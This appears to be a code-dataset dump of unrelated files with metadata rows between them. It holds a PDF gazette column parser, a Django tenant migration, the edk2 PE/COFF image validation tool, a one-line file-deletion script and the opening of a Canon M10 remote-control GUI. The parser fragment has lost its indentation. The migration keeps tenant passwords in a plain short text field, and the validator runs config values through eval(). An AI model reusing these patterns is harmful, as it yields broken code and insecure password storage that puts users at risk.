vertical_lines = self.get_contiguous_space_heights(max_line_size, page)
candidate_breakpoints = self.remove_contiguous_vertical_lines(vertical_lines, max_line_size)
return candidate_breakpoints
def remove_contiguous_vertical_lines(self, vertical_lines, max_line_size):
if vertical_lines == []:
return []
candidate_breakpoints = [vertical_lines[0]]
col_ctd = 1
while col_ctd < max_line_size and col_ctd < len(vertical_lines):
if self.columns_have_minimum_distance(col_ctd, candidate_breakpoints, vertical_lines):
if vertical_lines[col_ctd] not in candidate_breakpoints:
candidate_breakpoints.append(vertical_lines[col_ctd])
col_ctd +=1
return candidate_breakpoints
def columns_have_minimum_distance(self, col_ctd, candidate_breakpoints, vertical_lines, distance=20):
return abs(candidate_breakpoints[-1][0] - vertical_lines[col_ctd][0]) >= distance
def get_contiguous_space_heights(self, max_line_size, page):
contiguous_space_heights = []
left_delimiter = floor(0.2 * max_line_size)
        right_delimiter = floor(0.8 * max_line_size)
        parsing_window = range(right_delimiter, left_delimiter, -1)
for col_idx in parsing_window:
ctd = 1
max_val = 0
for line_idx, line in enumerate(page):
max_val = max(max_val, ctd)
if len(line) <= col_idx:
ctd += 1
else:
if self.col_offset_is_only_spaces(page, line_idx, col_idx):
ctd += 1
else:
ctd = 1
break_ratio = round(max_val/len(page), 2)
if break_ratio > self.min_break_ratio:
contiguous_space_heights.append((col_idx, break_ratio))
contiguous_space_heights = sorted(contiguous_space_heights, key=lambda x: x[1], reverse=True)
return contiguous_space_heights
def get_item_from_list(self, line, col_idx, default=' '):
"""
        Returns a list item if it exists, or 'default' otherwise
"""
try:
return line[col_idx]
        except IndexError:
return default
def col_offset_is_only_spaces(self, page, line_idx, col_idx, offset=6):
page_slice = page[line_idx : line_idx+offset]
col_slice = [self.get_item_from_list(line, col_idx) for line in page_slice]
return all(i==' ' for i in col_slice)
@staticmethod
def load_file(path):
lines = []
with open(path, 'r') as f:
lines = f.readlines()
return lines
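# Minimal sketch (illustrative only, not used by the class) of the break-ratio
# heuristic behind get_contiguous_space_heights(): a column index is a divider
# candidate when the longest run of consecutive lines that are blank (or too
# short) at that index covers most of the page. The real method also looks
# ahead a few lines via col_offset_is_only_spaces().
def _column_break_ratio(page, col_idx):
    if not page:
        return 0.0
    longest = run = 0
    for line in page:
        if len(line) <= col_idx or line[col_idx] == ' ':
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    return longest / len(page)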
if __name__ == "__main__":
input_f = sys.argv[1]
output_f = sys.argv[2]
# g = Gazette(input_f, "", "")
# g.__split_cols()
# print(g.linear_text)
for file in os.listdir(input_f):
g = Gazette(input_f + '/' + file,"", "")
print(f"Parsing {file}")
with open( output_f + "/" + file, 'w') as f:
f.write(g.linear_text)
| 30.152104
| 114
| 0.605452
| 8,886
| 0.953536
| 0
| 0
| 148
| 0.015882
| 0
| 0
| 1,919
| 0.205923
|
b19b6144712313556ed4af7f1913f9e90750f30c
| 1,065
|
py
|
Python
|
homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py
|
YellowRainBoots/2.0
|
bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5
|
[
"MIT"
] | 1
|
2021-01-19T00:48:10.000Z
|
2021-01-19T00:48:10.000Z
|
homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py
|
YellowRainBoots/2.0
|
bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5
|
[
"MIT"
] | 17
|
2020-01-23T05:51:18.000Z
|
2020-06-16T02:33:41.000Z
|
homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py
|
YellowRainBoots/2.0
|
bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5
|
[
"MIT"
] | 1
|
2020-08-06T02:10:58.000Z
|
2020-08-06T02:10:58.000Z
|
# Generated by Django 3.0.2 on 2020-03-03 21:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('PropertyManagers', '0001_initial'),
('Properties', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tenant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('firstName', models.CharField(max_length=100)),
('lastName', models.CharField(max_length=100)),
('email', models.CharField(max_length=255)),
('password', models.CharField(max_length=20)),
('place', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Properties.Property')),
('pm', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PropertyManagers.PropertyManager')),
],
),
]
| 35.5
| 139
| 0.611268
| 939
| 0.88169
| 0
| 0
| 0
| 0
| 0
| 0
| 225
| 0.211268
|
b19cab2172cb675aff98cad37d3038a9d288244b
| 21,295
|
py
|
Python
|
edk2toolext/image_validation.py
|
cfernald/edk2-pytool-extensions
|
3452e781a021e9b736fb10dbd3e7645a2efc400f
|
[
"BSD-2-Clause-Patent"
] | null | null | null |
edk2toolext/image_validation.py
|
cfernald/edk2-pytool-extensions
|
3452e781a021e9b736fb10dbd3e7645a2efc400f
|
[
"BSD-2-Clause-Patent"
] | null | null | null |
edk2toolext/image_validation.py
|
cfernald/edk2-pytool-extensions
|
3452e781a021e9b736fb10dbd3e7645a2efc400f
|
[
"BSD-2-Clause-Patent"
] | null | null | null |
# @file image_validation.py
# This tool allows a user to validate a PE/COFF file
# against specific requirements
##
# Copyright (c) Microsoft Corporation
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
##
from datetime import datetime
import os
from pefile import PE, SECTION_CHARACTERISTICS, MACHINE_TYPE, SUBSYSTEM_TYPE
import logging
import argparse
import sys
from edk2toolext import edk2_logging
########################
# Helper Functions #
########################
def has_characteristic(data, mask):
return ((data & mask) == mask)
def set_bit(data, bit):
return data | (1 << bit)
def clear_bit(data, bit):
return data & ~(1 << bit)
def set_nx_compat_flag(pe):
dllchar = pe.OPTIONAL_HEADER.DllCharacteristics
dllchar = set_bit(dllchar, 8) # 8th bit is the nx_compat_flag
pe.OPTIONAL_HEADER.DllCharacteristics = dllchar
return pe
def get_nx_compat_flag(pe):
dllchar = pe.OPTIONAL_HEADER.DllCharacteristics
if has_characteristic(dllchar, 256): # 256 (8th bit) is the mask
logging.info('True')
return 1
else:
logging.info('False')
return 0
def clear_nx_compat_flag(pe):
dllchar = pe.OPTIONAL_HEADER.DllCharacteristics
dllchar = clear_bit(dllchar, 8) # 8th bit is the nx_compat_flag
pe.OPTIONAL_HEADER.DllCharacteristics = dllchar
return pe
def fill_missing_requirements(default, target):
for key in default:
if key not in target:
target[key] = default[key]
return target
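# Quick illustration of the bit helpers above (values only, nothing executes here):
# the NX_COMPAT flag lives in bit 8 of DllCharacteristics, so its mask is
# 1 << 8 == 256. For example:
#     set_bit(0, 8) == 256
#     clear_bit(256, 8) == 0
#     has_characteristic(0x140, 256) == True   # 0x140 has bits 6 and 8 set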
class Result:
PASS = '[PASS]'
WARN = '[WARNING]'
SKIP = '[SKIP]'
FAIL = '[FAIL]'
class TestInterface:
def name(self):
"""Returns the name of the test"""
raise NotImplementedError("Must Override Test Interface")
def execute(self, pe, config_data):
"""
Executes the test
@param pe: The parser pefile
@param config_data: Configuration data for the specific target machine
and profile
"""
raise NotImplementedError("Must Override Test Interface")
class TestManager(object):
def __init__(self, config_data=None):
self.tests = []
if config_data:
self.config_data = config_data
else:
self.config_data = {
"TARGET_ARCH": {
"X64": "IMAGE_FILE_MACHINE_AMD64",
"IA32": "IMAGE_FILE_MACHINE_I386",
"AARCH64": "IMAGE_FILE_MACHINE_ARM64",
"ARM": "IMAGE_FILE_MACHINE_ARM"
},
"IMAGE_FILE_MACHINE_AMD64": {
"DEFAULT": {
"DATA_CODE_SEPARATION": True,
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 4096
}
]
},
"APP": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_APPLICATION"
]
},
"DRIVER": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER"
"IMAGE_SUBSYSTEM_EFI_ROM"
]
},
},
"IMAGE_FILE_MACHINE_ARM": {
"DEFAULT": {
"DATA_CODE_SEPARATION": True,
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT_LOGIC_SEP": "OR",
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
},
{
"COMPARISON": "==",
"VALUE": 32
}
]
},
"APP": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_APPLICATION"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
}
]
},
"DXE_DRIVER": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
}
]},
"PEI": {
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 32
}
]
}
},
"IMAGE_FILE_MACHINE_ARM64": {
"DEFAULT": {
"DATA_CODE_SEPARATION": True,
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT_LOGIC_SEP": "OR",
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
},
{
"COMPARISON": "==",
"VALUE": 32
}
]
},
"APP": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_APPLICATION"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
}
]
},
"DXE_DRIVER": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 64
}
]},
"PEI": {
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 32
}
]
}
},
"IMAGE_FILE_MACHINE_I386": {
"DEFAULT": {
"DATA_CODE_SEPARATION": True,
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_ROM"
],
"ALIGNMENT": [
{
"COMPARISON": "==",
"VALUE": 4096
}
]
},
"APP": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_APPLICATION"
]
},
"DRIVER": {
"ALLOWED_SUBSYSTEMS": [
"IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER",
"IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER"
"IMAGE_SUBSYSTEM_EFI_ROM"
]
},
"PEI": {}
}
}
def add_test(self, test):
"""
Adds a test to the test manager. Will be executed in the order added
@param test: [Test(TestInterface)] A class that inherits and overrides
the TestInterface class
"""
self.tests.append(test)
def add_tests(self, tests):
"""
Adds multiple test to the test manager. Tests will be executed in the
order added.
@param test: [List[Test(TestInterface)]] A list of classes that
inherits and overrides the TestInterface class
"""
self.tests.extend(tests)
def run_tests(self, pe, profile="DEFAULT"):
"""
Runs all tests that have been added to the test manager. Tests will be
executed in the order added
@param pe : [PE] The parsed pe
@param target_info: [Dict] A Dict that contains MACHINE_TYPE and
PROFILE information. If MachineType is not present, it will be
pulled from the parsed pe, however the user must provide the Module
Type
@return Result.PASS : All tests passed successfully (including warnings)
@return Result.SKIP : There is no information in the config file for the target and fv file type
        @return Result.FAIL : At least one test failed. Error messages can be found in the log
"""
# Catch any invalid profiles
machine_type = MACHINE_TYPE[pe.FILE_HEADER.Machine]
if not self.config_data[machine_type].get(profile):
logging.error(f'Profile type {profile} is invalid. Exiting...')
return Result.FAIL
# Fill any missing configurations for the specific module type with the default
default = self.config_data[machine_type]["DEFAULT"]
target = self.config_data[machine_type][profile]
target_requirements = fill_missing_requirements(default, target)
target_info = {
"MACHINE_TYPE": machine_type,
"PROFILE": profile
}
test_config_data = {
"TARGET_INFO": target_info,
"TARGET_REQUIREMENTS": target_requirements
}
logging.debug(f'Executing tests with settings [{machine_type}][{profile}]')
overall_result = Result.PASS
for test in self.tests:
logging.debug(f'Starting test: [{test.name()}]')
result = test.execute(pe, test_config_data)
# Overall Result can only go lower (Pass -> Warn -> Fail)
if result == Result.PASS:
logging.debug(f'{result}')
elif result == Result.SKIP:
logging.debug(f'{result}: No Requirements for [{machine_type}][{profile}]')
elif overall_result == Result.PASS:
overall_result = result
elif overall_result == Result.WARN and result == Result.FAIL:
overall_result = result
return overall_result
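# Minimal sketch (not used by TestManager) of the Pass -> Warn -> Fail downgrade
# rule that run_tests() applies: the overall result only ever gets worse, and a
# SKIP never changes it.
_SEVERITY = {Result.PASS: 0, Result.WARN: 1, Result.FAIL: 2}

def _combine_results(overall, new):
    if new == Result.SKIP:
        return overall
    return new if _SEVERITY[new] > _SEVERITY[overall] else overall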
###########################
# TESTS START #
###########################
class TestWriteExecuteFlags(TestInterface):
"""
Test: Section data / code separation verification
Detailed Description:
This test ensures that each section of the binary is not both
write-able and execute-able. Sections can only be one or the other
(or neither).This test is done by iterating over each section and
checking the characteristics label for the Write Mask (0x80000000)
and Execute Mask (0x20000000).
Output:
@Success: Only one (or neither) of the two masks (Write, Execute) are
present
@Skip: Test Skipped per config
@Fail: Both the Write and Execute flags are present
    Possible Solution:
        Update the failed section's characteristics to ensure it is either
        Write-able or Execute-able, but not both.
"""
def name(self):
return 'Section data / code separation verification'
def execute(self, pe, config_data):
target_requirements = config_data["TARGET_REQUIREMENTS"]
if target_requirements.get("DATA_CODE_SEPARATION", False) is False:
return Result.SKIP
for section in pe.sections:
if (has_characteristic(section.Characteristics, SECTION_CHARACTERISTICS["IMAGE_SCN_MEM_EXECUTE"])
and has_characteristic(section.Characteristics, SECTION_CHARACTERISTICS["IMAGE_SCN_MEM_WRITE"])):
logging.error(f'[{Result.FAIL}]: Section [{section.Name.decode().strip()}] \
should not be both Write and Execute')
return Result.FAIL
return Result.PASS
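# Concrete mask check for reference (matching the docstring above):
# IMAGE_SCN_MEM_EXECUTE is 0x20000000 and IMAGE_SCN_MEM_WRITE is 0x80000000,
# so a section with Characteristics 0xA0000000 carries both flags and fails:
# has_characteristic(0xA0000000, 0x20000000) and
# has_characteristic(0xA0000000, 0x80000000) are both True.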
class TestSectionAlignment(TestInterface):
"""
Test: Section alignment verification
Detailed Description:
Checks the section alignment of the binary by accessing the optional
header, then the section alignment. This value must meet the
requirements specified in the config file.
Output:
@Success: Image alignment meets the requirement specified in the
config file
@Warn: Image Alignment value is not found in the Optional Header or
set to 0
@Skip: No Alignment requirements specified in the config file
@Fail: Image alignment does not meet the requirements specified in
the config file
Possible Solution:
Update the section alignment of the binary to match the
requirements specified in the config file
"""
def name(self):
return 'Section alignment verification'
def execute(self, pe, config_data):
target_requirements = config_data["TARGET_REQUIREMENTS"]
target_info = config_data["TARGET_INFO"]
alignments = target_requirements.get("ALIGNMENT")
if alignments is None or len(alignments) == 0:
return Result.SKIP
        try:
            alignment = pe.OPTIONAL_HEADER.SectionAlignment
        except AttributeError:
            logging.warning("Section Alignment is not present")
return Result.WARN
if alignment is None or alignment == 0:
return Result.WARN
if len(alignments) > 1:
logical_separator = target_requirements.get("ALIGNMENT_LOGIC_SEP")
if logical_separator is None:
logging.error("Multiple alignment requirements exist, but no logical separator provided")
return Result.FAIL
elif logical_separator == "AND":
result = True
for reqs in alignments:
result = result and eval(f'{alignment} {reqs["COMPARISON"]} {reqs["VALUE"]}')
elif logical_separator == "OR":
result = False
for reqs in alignments:
result = result or eval(f'{alignment} {reqs["COMPARISON"]} {reqs["VALUE"]}')
else:
logging.error("Invalid logical separator provided")
return Result.FAIL
else:
req = alignments[0]
result = eval(f'{alignment} {req["COMPARISON"]} {req["VALUE"]}')
if result is False:
            logging.error(f'[{Result.FAIL}]: Section Alignment Required: \
[{target_info["MACHINE_TYPE"]}] \
[{target_info["PROFILE"]}]: \
[(Detected): {alignment}]')
return Result.FAIL
return Result.PASS
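# A minimal eval-free sketch of the comparison used above, assuming the same
# requirement dicts ({"COMPARISON": ..., "VALUE": ...}); this is an illustrative
# alternative, not what TestSectionAlignment.execute() calls.
import operator

_ALIGN_OPS = {"==": operator.eq, "!=": operator.ne, "<": operator.lt,
              "<=": operator.le, ">": operator.gt, ">=": operator.ge}

def _alignment_ok(alignment, requirement):
    return _ALIGN_OPS[requirement["COMPARISON"]](alignment, requirement["VALUE"])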
class TestSubsystemValue(TestInterface):
"""
Test: Subsystem type verification
Detailed Description:
Checks the subsystem value by accessing the optional header, then
subsystem value. This value must match one of the allowed subsystem
described in the config file
Output:
@Success: Subsystem type found in the optional header matches one of
the allowed subsystems
@Warn : Subsystem type is not found in the optional header
@Skip : No subsystem type restrictions specified
@Fail : Subsystem type found in the optional header does not match
one of the allowed subsystems
Possible Solution:
Update the subsystem type in the source code.
"""
def name(self):
return 'Subsystem type verification'
def execute(self, pe, config_data):
target_requirements = config_data["TARGET_REQUIREMENTS"]
subsystems = target_requirements.get("ALLOWED_SUBSYSTEMS")
if subsystems is None or len(subsystems) == 0:
return Result.SKIP
        try:
            subsystem = pe.OPTIONAL_HEADER.Subsystem
        except AttributeError:
            logging.warning("Subsystem type is not present")
return Result.WARN
if subsystem is None:
logging.warning(f'[{Result.WARN}]: Subsystem type is not present in the optional header.')
return Result.WARN
actual_subsystem = SUBSYSTEM_TYPE.get(subsystem)
if actual_subsystem is None:
            logging.error(f'[{Result.FAIL}]: Invalid Subsystem present')
return Result.FAIL
if actual_subsystem in subsystems:
return Result.PASS
else:
            logging.error(f'{Result.FAIL}: Subsystem Type [{actual_subsystem}] not allowed.')
return Result.FAIL
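# For reference, the EFI subsystem values defined by the PE format (and mapped
# by pefile's SUBSYSTEM_TYPE) are: 10 = IMAGE_SUBSYSTEM_EFI_APPLICATION,
# 11 = IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER,
# 12 = IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER, 13 = IMAGE_SUBSYSTEM_EFI_ROM.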
###########################
# TESTS END #
###########################
#
# Command Line Interface configuration
#
def get_cli_args(args):
    parser = argparse.ArgumentParser(description='An image validation tool for memory mitigation')
parser.add_argument('-i', '--file',
type=str,
required=True,
                        help='path to the image that needs to be validated.')
parser.add_argument('-d', '--debug',
action='store_true',
default=False)
parser.add_argument('-p', '--profile',
type=str,
default=None,
help='the profile config to be verified against. \
Will use the default, if not provided')
group = parser.add_mutually_exclusive_group()
group.add_argument('--set-nx-compat',
action='store_true',
default=False,
help='sets the NX_COMPAT flag')
group.add_argument('--clear-nx-compat',
action='store_true',
default=False,
help='clears the NX_COMPAT flag')
group.add_argument('--get-nx-compat',
action='store_true',
default=False,
help='returns the value of the NX_COMPAT flag')
return parser.parse_args(args)
def main():
# setup main console as logger
logger = logging.getLogger('')
logger.setLevel(logging.INFO)
console = edk2_logging.setup_console_logging(False)
logger.addHandler(console)
args = get_cli_args(sys.argv[1:])
if args.debug is True:
console.setLevel(logging.DEBUG)
logging.info("Log Started: " + datetime.strftime(
datetime.now(), "%A, %B %d, %Y %I:%M%p"))
# pe.write(filename=f'{basename[0]}_nx_clear.{basename[1]}'
    # Set the nx compatibility flag and exit
    if args.set_nx_compat:
pe = PE(args.file)
set_nx_compat_flag(pe)
os.remove(args.file)
pe.write(args.file)
exit(0)
    # clear the nx compatibility flag and exit
    if args.clear_nx_compat:
pe = PE(args.file)
clear_nx_compat_flag(pe)
os.remove(args.file)
pe.write(args.file)
exit(0)
    # exit with status equal to whether nx compatibility is present or not
    if args.get_nx_compat is True:
        exit(get_nx_compat_flag(PE(args.file)))
test_manager = TestManager()
test_manager.add_test(TestWriteExecuteFlags())
test_manager.add_test(TestSectionAlignment())
test_manager.add_test(TestSubsystemValue())
pe = PE(args.file)
if not args.profile:
result = test_manager.run_tests(pe)
else:
result = test_manager.run_tests(pe, args.profile)
logging.info(f'Overall Result: {result}')
if result == Result.SKIP:
logging.info('No Test requirements in the config file for this file.')
elif result == Result.PASS or result == Result.WARN:
sys.exit(0)
else:
sys.exit(1)
if __name__ == '__main__':
main()
| 34.795752
| 112
| 0.505565
| 16,493
| 0.774501
| 0
| 0
| 0
| 0
| 0
| 0
| 8,707
| 0.408875
|
b19eba8650f17954158c7ab292c05abfa2a4065c
| 44
|
py
|
Python
|
src/basics/files/delete_fichero.py
|
FoxNeo/MyPythonProjects
|
3499ef0853f0087f6f143e1633b0a88a3d7b9818
|
[
"MIT"
] | null | null | null |
src/basics/files/delete_fichero.py
|
FoxNeo/MyPythonProjects
|
3499ef0853f0087f6f143e1633b0a88a3d7b9818
|
[
"MIT"
] | null | null | null |
src/basics/files/delete_fichero.py
|
FoxNeo/MyPythonProjects
|
3499ef0853f0087f6f143e1633b0a88a3d7b9818
|
[
"MIT"
] | null | null | null |
import os
os.remove("fichero_generado.txt")
| 14.666667
| 33
| 0.795455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 22
| 0.5
|
b19fd8f1c6f4a820c1d3db28aa85e5f3c1020cae
| 31,290
|
py
|
Python
|
Canon-M10.py
|
emanuelelaface/Canon-M10
|
bd4559b2e528fbaa9559a92c4e752ce5f96c1053
|
[
"MIT"
] | 3
|
2019-12-06T22:32:31.000Z
|
2022-02-13T00:35:55.000Z
|
Canon-M10.py
|
emanuelelaface/Canon-M10
|
bd4559b2e528fbaa9559a92c4e752ce5f96c1053
|
[
"MIT"
] | null | null | null |
Canon-M10.py
|
emanuelelaface/Canon-M10
|
bd4559b2e528fbaa9559a92c4e752ce5f96c1053
|
[
"MIT"
] | 5
|
2019-12-06T22:32:23.000Z
|
2021-12-26T20:46:56.000Z
|
# -*- coding: utf-8 -*-
from remi.gui import *
from remi import start, App
import cv2
import numpy
import chdkptp
import time
import threading
import rawpy
class OpenCVVideoWidget(Image):
def __init__(self, **kwargs):
super(OpenCVVideoWidget, self).__init__("/%s/get_image_data" % id(self), **kwargs)
self.frame_index = 0
self.frame = numpy.full((480, 720,3),155, dtype=numpy.uint8)
def update(self, app_instance):
self.frame_index = numpy.random.randint(1e8)
app_instance.execute_javascript("""
var url = '/%(id)s/get_image_data?index=%(frame_index)s';
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.responseType = 'blob'
xhr.onload = function(e){
urlCreator = window.URL || window.webkitURL;
urlCreator.revokeObjectURL(document.getElementById('%(id)s').src);
imageUrl = urlCreator.createObjectURL(this.response);
document.getElementById('%(id)s').src = imageUrl;
}
xhr.send();
""" % {'id': id(self), 'frame_index':self.frame_index})
def get_image_data(self, index=0):
ret, jpeg = cv2.imencode('.jpeg', self.frame)
if ret:
headers = {'Content-type': 'image/jpeg'}
            return [jpeg.tobytes(), headers]
return None, None
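# How the widget above streams video: update() injects JavaScript that fetches
# /<id>/get_image_data as a blob with a random ?index= query string (a cache
# buster), then swaps the <img> src to the resulting object URL, so each idle()
# cycle pushes one freshly JPEG-encoded frame to the browser.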
class M10GUI(App):
def __init__(self, *args, **kwargs):
        if 'editing_mode' not in kwargs:
super(M10GUI, self).__init__(*args, static_file_path={'my_res':'./res/'})
self.stop_event = threading.Event()
self.stop_event.clear()
def log_message(self, *args, **kwargs):
pass
def idle(self):
if self.live_view_check.get_value():
vp, bm = self.get_live_view()
self.image.frame = numpy.clip(vp.astype(numpy.uint16)+ bm.astype(numpy.uint16),0,255).astype(numpy.uint8)
self.image.update(self)
if time.time()-self.timer > 10:
try:
self.temperature_label.set_text('Temp (\xb0C): '+str(self.camera.lua_execute('get_temperature(1)')))
self.battery_label.set_text('Batt (V): '+str(self.camera.lua_execute('get_vbatt()')/1000.))
            except Exception:
                pass
self.timer = time.time()
pass
def main(self):
self.timer = time.time()
return M10GUI.construct_ui(self)
def on_close(self):
self.stop_event.set()
super(M10GUI, self).on_close()
@staticmethod
def construct_ui(self):
container = GridBox(width='100%', height='100%', style={'margin':'0px auto', "background-color":"#d5d0c7"})
container.attributes.update({"class":"Widget","editor_constructor":"()","editor_varname":"container","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Widget"})
container.set_from_asciiart("""
| | | | iso_label | shutter_label | pics_label | time_label | live_view_label | zoom_label |
| shoot_button | video_button | stop_button | iso_menu | shutter_value | pics_value | time_value | live_view_check | zoom_menu |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| lua_label | lua_label | lua_value | lua_value | lua_value | lua_value | lua_value | lua_value | lua_value |
| status_label | status_label | status_label | status_label | status_label | status_label | temperature_label | battery_label | connect_button |
""", 1, 1)
self.shoot_button = Button('Shoot')
self.shoot_button.set_enabled(False)
self.shoot_button.style.update({"width":"100%","height":"100%"})
self.shoot_button.attributes.update({"class":"Button","editor_constructor":"('Shoot')","editor_varname":"shoot_button","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Button"})
self.shoot_button.onclick.do(self.start_shoot)
self.video_button = Button('Video')
self.video_button.set_enabled(False)
self.video_button.style.update({"width":"100%","height":"100%"})
self.video_button.attributes.update({"class":"Button","editor_constructor":"('Video')","editor_varname":"video_button","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Button"})
self.video_button.onclick.do(self.start_video)
self.stop_button = Button('Stop')
self.stop_button.set_enabled(False)
self.stop_button.style.update({"width":"100%","height":"100%"})
self.stop_button.attributes.update({"class":"Button","editor_constructor":"('Stop')","editor_varname":"stop_button","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Button"})
self.stop_button.onclick.do(self.stop_action)
self.iso_menu = DropDown.new_from_list(('Auto','100','125','160','200','250','320','400', '500','640','800','1000','1250','1600','2000','2500', '3200','4000','5000','6400','8000','10000','12800'))
self.iso_menu.set_enabled(False)
self.iso_menu.set_value('Auto')
self.iso_menu.attributes.update({"class":"DropDown","editor_constructor":"()","editor_varname":"iso_menu","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"DropDown"})
self.iso_menu.onchange.do(self.set_iso)
self.shutter_value = TextInput(True,'')
self.shutter_value.set_enabled(False)
self.shutter_value.attributes.update({"class":"TextInput","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"shutter_value","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"TextInput"})
self.shutter_value.onchange.do(self.change_shutter)
iso_label = Label('ISO')
iso_label.attributes.update({"class":"Label","editor_constructor":"('ISO')","editor_varname":"iso_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
shutter_label = Label('Shutter')
shutter_label.attributes.update({"class":"Label","editor_constructor":"('Shutter')","editor_varname":"shutter_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.pics_value = TextInput(True,'')
self.pics_value.set_enabled(False)
self.pics_value.attributes.update({"class":"TextInput","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"pics_value","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"TextInput"})
pics_label = Label('Pics')
pics_label.attributes.update({"class":"Label","editor_constructor":"('Pics')","editor_varname":"pics_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.time_value = TextInput(True,'')
self.time_value.set_enabled(False)
self.time_value.attributes.update({"class":"TextInput","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"time_value","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"TextInput"})
time_label = Label('Hold')
time_label.attributes.update({"class":"Label","editor_constructor":"('Time')","editor_varname":"time_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.live_view_check = CheckBox(False,'')
self.live_view_check.set_enabled(False)
self.live_view_check.onchange.do(self.toggle_live)
self.live_view_check.attributes.update({"class":"checkbox","value":"","type":"checkbox","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"live_view_check","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"CheckBox"})
live_view_label = Label('Live')
live_view_label.attributes.update({"class":"Label","editor_constructor":"('Live')","editor_varname":"live_view_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.zoom_menu = DropDown.new_from_list(('1', '5', '10'))
self.zoom_menu.set_enabled(False)
self.zoom_menu.set_value('1')
self.zoom_menu.attributes.update({"class":"DropDown","editor_constructor":"()","editor_varname":"zoom_menu","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"DropDown"})
self.zoom_menu.onchange.do(self.change_zoom)
zoom_label = Label('Zoom')
zoom_label.attributes.update({"class":"Label","editor_constructor":"('Zoom')","editor_varname":"zoom_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.image = OpenCVVideoWidget(width='100%', height='100%')
self.image.attributes.update({"class":"Image","width":"720","height":"480","editor_constructor":"(720,480)","editor_varname":"image","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Image"})
infos_label = Label('Infos')
